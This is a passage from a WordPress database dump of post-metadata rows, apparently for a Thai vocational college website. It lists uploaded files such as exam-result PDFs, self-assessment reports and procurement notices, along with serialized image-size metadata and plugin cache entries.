17_590103491365843_4906639912477917184_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6981, 2849, '_thumbnail_id', '2850'),
(6985, 2849, '_hide_featured', NULL),
(6986, 2849, '_wpas_done_all', '1'),
(6991, 2853, '_edit_lock', '1527756030:3'),
(6992, 2853, '_edit_last', '3'),
(6993, 2854, '_wp_attached_file', '2018/05/33994017_590602247982634_636889645078020096_o.jpg'),
(6994, 2854, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:57:\"2018/05/33994017_590602247982634_636889645078020096_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"33994017_590602247982634_636889645078020096_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"33994017_590602247982634_636889645078020096_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"33994017_590602247982634_636889645078020096_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"33994017_590602247982634_636889645078020096_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"33994017_590602247982634_636889645078020096_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6995, 2853, '_thumbnail_id', '2854'),
(6999, 2853, '_hide_featured', NULL),
(7000, 2853, '_wpas_done_all', '1'),
(7001, 2857, '_edit_lock', '1527756670:3'),
(7002, 2857, '_edit_last', '3'),
(7003, 2858, '_wp_attached_file', '2018/05/ประกาศผลสอบเจ้าหน้าที่.pdf'),
(7004, 2859, '_wp_attached_file', '2018/05/ประกาศผลสอบครูอัตราจ้าง.pdf'),
(7008, 2857, '_hide_featured', NULL),
(7009, 2857, '_wpas_done_all', '1'),
(7010, 2857, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574575322;s:7:\"payload\";a:0:{}}}'),
(7011, 2862, '_edit_lock', '1527757691:3'),
(7012, 2862, '_edit_last', '3'),
(7016, 2862, '_hide_featured', NULL),
(7017, 2862, '_wpas_done_all', '1'),
(7018, 2862, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575713654;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(7019, 2853, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575676799;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4735;}i:1;a:1:{s:2:\"id\";i:4687;}i:2;a:1:{s:2:\"id\";i:5026;}}}}'),
(7020, 2866, '_wp_attached_file', '2018/06/555555.jpg'),
(7021, 2866, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1534;s:6:\"height\";i:742;s:4:\"file\";s:18:\"2018/06/555555.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"555555-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"555555-300x145.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"555555-768x371.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:371;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"555555-1024x495.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"555555-400x193.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7022, 2871, '_edit_lock', '1629872034:14'),
(7023, 2871, '_edit_last', '14'),
(7024, 2872, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf'),
(7025, 2873, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf'),
(7026, 2874, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf'),
(7027, 2875, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf'),
(7028, 2876, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf'),
(7029, 2877, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf'),
(7030, 2878, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf'),
(7031, 2879, '_wp_attached_file', '2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf'),
(7032, 2871, '_hide_featured', NULL),
(7033, 2883, '_edit_lock', '1625562420:14'),
(7034, 2883, '_edit_last', '14'),
(7035, 2884, '_wp_attached_file', '2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf'),
(7036, 2885, '_wp_attached_file', '2018/06/RTC-Logo.jpg'),
(7037, 2885, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3861;s:6:\"height\";i:3867;s:4:\"file\";s:20:\"2018/06/RTC-Logo.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"RTC-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"RTC-Logo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"RTC-Logo-768x769.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"RTC-Logo-1022x1024.jpg\";s:5:\"width\";i:1022;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"RTC-Logo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7038, 2897, '_wp_attached_file', '2018/06/1-6-2561-14-33-36.jpg'),
(7039, 2897, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:241;s:4:\"file\";s:29:\"2018/06/1-6-2561-14-33-36.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"1-6-2561-14-33-36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7040, 2898, '_wp_attached_file', '2018/06/1-6-2561-14-39-39.jpg'),
(7041, 2898, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/06/1-6-2561-14-39-39.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"1-6-2561-14-39-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"1-6-2561-14-39-39-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"1-6-2561-14-39-39-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7042, 2899, '_wp_attached_file', '2018/06/1-6-2561-14-40-28.jpg'),
(7043, 2899, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:335;s:4:\"file\";s:29:\"2018/06/1-6-2561-14-40-28.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"1-6-2561-14-40-28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"1-6-2561-14-40-28-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"1-6-2561-14-40-28-400x230.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7044, 2883, '_hide_featured', NULL),
(7045, 2903, '_wp_attached_file', '2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf'),
(7046, 2904, '_wp_attached_file', '2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf'),
(7047, 2905, '_wp_attached_file', '2018/06/ทักษะชาตื.pdf'),
(7048, 2908, '_wp_attached_file', '2018/01/6-2-2561-9-55-14.jpg'),
(7049, 2908, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:154;s:6:\"height\";i:197;s:4:\"file\";s:28:\"2018/01/6-2-2561-9-55-14.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"6-2-2561-9-55-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7054, 2912, '_wp_attached_file', '2018/01/6-2-2561-9-56-17.jpg'),
(7055, 2912, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:150;s:6:\"height\";i:199;s:4:\"file\";s:28:\"2018/01/6-2-2561-9-56-17.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"6-2-2561-9-56-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7058, 2914, '_wp_attached_file', '2018/01/-อ่อนส้มกฤษ-1-e1537240439493.jpg'),
(7059, 2914, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:166;s:6:\"height\";i:245;s:4:\"file\";s:60:\"2018/01/-อ่อนส้มกฤษ-1-e1537240439493.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"นายยุทธนา-อ่อนส้มกฤษ-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"นายยุทธนา-อ่อนส้มกฤษ-1-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:72:\"นายยุทธนา-อ่อนส้มกฤษ-1-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7062, 2849, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575478753;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5889;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:4685;}}}}'),
(7063, 2916, '_edit_lock', '1528108345:1'),
(7064, 2916, '_edit_last', '1'),
(7065, 2917, '_wp_attached_file', '2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf'),
(7066, 2918, '_wp_attached_file', '2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf'),
(7067, 2919, '_wp_attached_file', '2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf'),
(7068, 2917, '_cg_img_link', '/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf'),
(7069, 2917, '_cg_link_target', ''),
(7073, 2916, '_hide_featured', NULL),
(7074, 2916, '_wpas_done_all', '1'),
(7075, 2916, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575665021;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5952;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5589;}}}}'),
(7080, 2716, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574835095;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4994;}i:1;a:1:{s:2:\"id\";i:4070;}i:2;a:1:{s:2:\"id\";i:4735;}}}}'),
(7081, 2927, '_edit_lock', '1528277091:3'),
(7082, 2927, '_edit_last', '3'),
(7083, 2928, '_wp_attached_file', '2018/06/201806061541.pdf'),
(7084, 2929, '_wp_attached_file', '2018/06/201806061541-1.pdf'),
(7088, 2927, '_hide_featured', NULL),
(7089, 2927, '_wpas_done_all', '1'),
(7090, 2927, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574703431;s:7:\"payload\";a:0:{}}}'),
(7091, 2933, '_edit_lock', '1528353250:3'),
(7092, 2933, '_edit_last', '3'),
(7093, 2934, '_wp_attached_file', '2018/06/34258945_592723137770545_4938090166985162752_o.jpg'),
(7094, 2934, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/06/34258945_592723137770545_4938090166985162752_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"34258945_592723137770545_4938090166985162752_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"34258945_592723137770545_4938090166985162752_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"34258945_592723137770545_4938090166985162752_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"34258945_592723137770545_4938090166985162752_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"34258945_592723137770545_4938090166985162752_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7095, 2933, '_thumbnail_id', '2934'),
(7099, 2933, '_hide_featured', NULL),
(7100, 2933, '_wpas_done_all', '1'),
(7101, 2938, '_wp_attached_file', '2018/06/ปฏิทินปฏิบัติงาน-ประจำปีการศึกษา-2560.pdf'),
(7102, 2940, '_edit_lock', '1528360752:3'),
(7103, 2940, '_edit_last', '3'),
(7104, 2941, '_wp_attached_file', '2018/06/ประกวดราคาซื้อครุภัณฑ์-3-รายการ-คอมพิวเตอร์ฯ.pdf'),
(7108, 2940, '_hide_featured', NULL),
(7109, 2940, '_wpas_done_all', '1'),
(7110, 2940, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1567862424;s:7:\"payload\";a:0:{}}}'),
(7111, 2933, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575371810;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4163;}i:1;a:1:{s:2:\"id\";i:4013;}i:2;a:1:{s:2:\"id\";i:5625;}}}}'),
(7112, 2944, '_wp_attached_file', '2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx'),
(7113, 2945, '_wp_attached_file', '2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx'),
(7114, 2946, '_wp_attached_file', '2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf'),
(7115, 2947, '_edit_lock', '1544068126:3'),
(7116, 2947, '_edit_last', '3'),
(7117, 2947, '_oembed_5a9c1ff2b0233f660d4f8508fc011bec', '{{unknown}}'),
(7118, 2949, '_edit_lock', '1528778627:3'),
(7119, 2949, '_edit_last', '3'),
(7120, 2950, '_wp_attached_file', '2018/06/4.jpg'),
(7121, 2950, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1135;s:6:\"height\";i:677;s:4:\"file\";s:13:\"2018/06/4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x458.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:458;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"4-1024x611.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:611;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"4-400x239.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7122, 2951, '_wp_attached_file', '2018/06/3.jpg'),
(7123, 2951, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1022;s:6:\"height\";i:688;s:4:\"file\";s:13:\"2018/06/3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7124, 2952, '_wp_attached_file', '2018/06/2.jpg'),
(7125, 2952, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1187;s:6:\"height\";i:677;s:4:\"file\";s:13:\"2018/06/2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x438.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x584.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x228.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7126, 2953, '_wp_attached_file', '2018/06/1.jpg'),
(7127, 2953, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:870;s:6:\"height\";i:501;s:4:\"file\";s:13:\"2018/06/1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x442.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:442;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x230.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1